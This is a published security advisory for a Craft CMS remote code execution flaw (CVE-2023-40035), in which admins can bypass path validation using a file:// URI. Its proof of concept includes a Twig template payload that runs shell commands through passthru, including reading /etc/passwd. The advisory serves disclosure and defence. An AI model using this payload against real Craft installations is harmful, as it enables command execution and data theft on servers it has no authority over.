CVE-2023-40035 – craftcms/cms
Package
Manager: composer
Name: craftcms/cms
Vulnerable Version: >=4.0.0-rc1 <4.4.15 || >=3.0.0 <3.8.15
Severity
Level: High
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
EPSS: 0.00379 pctl0.58616
Details
Craft CMS vulnerable to Remote Code Execution via validatePath bypass ### Summary Bypassing the validatePath function can lead to potential Remote Code Execution (Post-authentication, ALLOW_ADMIN_CHANGES=true) ### Details In bootstrap.php, the SystemPaths path is set as below. ```php // Set the vendor path. By default assume that it's 4 levels up from here $vendorPath = $findConfigPath('--vendorPath', 'CRAFT_VENDOR_PATH') ?? dirname(__DIR__, 3); // Set the "project root" path that contains config/, storage/, etc. By default assume that it's up a level from vendor/. $rootPath = $findConfigPath('--basePath', 'CRAFT_BASE_PATH') ?? dirname($vendorPath); // By default the remaining directories will be in the base directory $dotenvPath = $findConfigPath('--dotenvPath', 'CRAFT_DOTENV_PATH') ?? "$rootPath/.env"; $configPath = $findConfigPath('--configPath', 'CRAFT_CONFIG_PATH') ?? "$rootPath/config"; $contentMigrationsPath = $findConfigPath('--contentMigrationsPath', 'CRAFT_CONTENT_MIGRATIONS_PATH') ?? "$rootPath/migrations"; $storagePath = $findConfigPath('--storagePath', 'CRAFT_STORAGE_PATH') ?? "$rootPath/storage"; $templatesPath = $findConfigPath('--templatesPath', 'CRAFT_TEMPLATES_PATH') ?? "$rootPath/templates"; $translationsPath = $findConfigPath('--translationsPath', 'CRAFT_TRANSLATIONS_PATH') ?? "$rootPath/translations"; $testsPath = $findConfigPath('--testsPath', 'CRAFT_TESTS_PATH') ?? "$rootPath/tests"; ``` Because paths are validated based on the /path1/path2 format, this can be bypassed using a file URI scheme such as file:///path1/path2. File scheme is supported in mkdir() ```php /** * @param string $attribute * @param array|null $params * @param InlineValidator $validator * @return void * @since 4.4.6 */ public function validatePath(string $attribute, ?array $params, InlineValidator $validator): void { // Make sure it’s not within any of the system directories $path = FileHelper::absolutePath($this->getRootPath(), '/'); $systemDirs = Craft::$app->getPath()->getSystemPaths(); foreach ($systemDirs as $dir) { $dir = FileHelper::absolutePath($dir, '/'); if (str_starts_with("$path/", "$dir/")) { $validator->addError($this, $attribute, Craft::t('app', 'Local volumes cannot be located within system directories.')); break; } } } ``` ref. https://www.php.net/manual/en/wrappers.file.php ### PoC 1) Create a new filesystem. **Base Path: file:///var/www/html/templates**  2) Create a new asset volume. Asset Filesystem: local_bypass  3) Upload a ttml file with rce template code. Confirm poc.ttml file created in /var/www/html/templates ```twig {{'<pre>'}} {{1337*1337}} {{['cat /etc/passwd']|map('passthru')|join}} {{['id;pwd;ls -altr /']|map('passthru')|join}} ```   4) Create a new route. URI: * , Template: poc.ttml  5) Confirm RCE on arbitrary path ( /* )  #### PoC Env  ### Impact Take control of vulnerable systems, Data exfiltrations, Malware execution, Pivoting, etc. although the vulnerability is exploitable only in the authenticated users, configuration with ALLOW_ADMIN_CHANGES=true, there is still a potential security threat (Remote Code Execution)
Metadata
Created: 2023-08-21T19:58:04Z
Modified: 2025-07-16T21:00:57Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/08/GHSA-44wr-rmwq-3phw/GHSA-44wr-rmwq-3phw.json
CWE IDs: ["CWE-74"]
Alternative ID: GHSA-44wr-rmwq-3phw
Finding: F184
Auto approve: 1